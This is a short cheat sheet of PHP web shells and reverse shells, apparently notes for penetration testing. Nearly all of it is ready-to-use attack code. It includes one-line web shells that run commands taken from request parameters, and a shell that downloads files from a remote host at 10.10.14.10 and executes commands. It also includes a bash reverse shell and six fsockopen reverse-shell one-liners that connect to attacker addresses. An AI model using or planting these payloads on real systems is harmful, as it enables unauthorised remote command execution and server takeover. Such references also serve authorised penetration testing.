PHP Shells

PHP can execute bash command using exec, shell_exec, system, passthru and popen.

PHP cmd exec

PHP simple

<?php echo system($_REQUEST['cybo']); ?>

PHP Oneliner

<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>

PHP with file upload

$phpcode = <<<'EOD'
    
<?php
if (isset($_REQUEST['fupload'])) {
    file_put_contents($_REQUEST['fupload'], file_get_contents("http://10.10.14.10:8000/" . $_REQUEST['fupload']));
 };
if (isset($_REQUEST['fexec'])) {
    echo "<pre>" . shell_exec($_REQUEST['fexec']) . "</pre>";
 };
?>
EOD;                                                   

Using EOD we can assign multiple lines code to a variable.
Has both capabilities of uploading and executing ?fupload=<file-name>&&fexec=<command-to-execute>

PHP reverse shell

<?php exec('/bin/bash -c "bash -i >& /dev/tcp/10.10.14.15/9001 0>&1"'); ?>

PHP reverse shells - other commands

php -r '$sock=fsockopen("10.0.0.1",4242);exec("/bin/sh -i <&3 >&3 2>&3");'
php -r '$sock=fsockopen("10.0.0.1",4242);shell_exec("/bin/sh -i <&3 >&3 2>&3");'
php -r '$sock=fsockopen("10.0.0.1",4242);`/bin/sh -i <&3 >&3 2>&3`;'
php -r '$sock=fsockopen("10.0.0.1",4242);system("/bin/sh -i <&3 >&3 2>&3");'
php -r '$sock=fsockopen("10.0.0.1",4242);passthru("/bin/sh -i <&3 >&3 2>&3");'
php -r '$sock=fsockopen("10.0.0.1",4242);popen("/bin/sh -i <&3 >&3 2>&3", "r");'

ref: php resource

PHP cmd exec​

PHP simple​

PHP Oneliner​

PHP with file upload​

PHP reverse shell​